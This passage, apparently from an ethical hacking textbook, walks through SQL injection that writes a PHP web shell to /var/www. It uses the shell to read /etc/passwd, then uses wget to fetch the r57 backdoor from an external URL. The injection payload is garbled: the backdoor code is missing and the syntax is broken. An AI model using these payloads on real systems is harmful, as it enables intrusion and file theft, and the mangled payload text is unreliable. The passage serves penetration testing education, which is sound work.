354
◾
Ethical Hacking and Penetration Testing Guide
/var/www
directory, which is our current directory that happens to be writable. You can deter-
mine the current
directory by executing the
datadir()
function.
Our simple one-line backdoor is as follows:
This will help us execute system commands via the GET parameter CMD. The
passthru()
in PHP allows us to execute arbitrary commands upon the system. To write files in the directory,
we will use
INTO OUTOFILE
command and specify the directory.
Syntax
http://localhost/index.php?support=yes’ and 1=0 UNION SELECT 1,GET[\’cmd’\’)]);>,3,4,5,6 INTO OUTFILE ‘/var/www/shell.php’ –
Therefore, as the
command is pretty much simple, it will write the PHP code in the column
to a file shell.php.
If everything goes fine, we should have got our backdoor uploaded
and we can easily execute
commands via the cmd parameter. Let’s try reading
/etc/passwd
.
Syntax
http://localhost/shell.php?cmd=cat/etc/passwd
Here, we can execute our commands on the target system, which is Linux based. We would
try to read Linux-specific files. If
it were running a Windows OS, we would have tried to read files
such as “boot.ini” or “winboot.ini”.
Since we are now able to execute our commands upon the system, we will now try to down-
load a more powerful backdoor from an external url and write onto the system. We can use wget
to download a file from an external location with parameter –O to output
the particular file to a
location.
Syntax
wget “http://target.com/r57.txt” –O r57.php
Now, we can directly access our r57.php shell by accessing the following url:
http://localhost/r57.php
